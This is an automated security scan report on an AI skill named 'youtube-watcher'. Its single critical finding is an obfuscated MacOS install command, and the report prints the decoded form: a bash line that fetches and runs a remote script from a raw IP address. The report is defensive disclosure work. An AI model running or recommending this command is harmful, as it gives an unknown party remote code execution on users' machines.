Trust Assessment
youtube-watcher received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution via Malicious Installer Script.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution via Malicious Installer Script The skill's installation instructions for MacOS explicitly direct users to copy and execute a command that downloads and runs an arbitrary script from a suspicious IP address (`91.92.242.30`). The command uses base64 encoding to obfuscate the payload, which decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This allows for remote code execution on the user's machine and poses a severe supply chain risk, as the integrity and content of the downloaded script cannot be verified. Immediately remove the malicious MacOS installation command. Provide a secure, verifiable installation method for OpenClawProvider, or remove the dependency if it cannot be installed securely. Users should never be instructed to pipe arbitrary remote content to `bash`. | LLM | SKILL.md:11 |
Scan History
Embed Code
[](https://skillshield.io/report/021472955c0cf39d)
Powered by SkillShield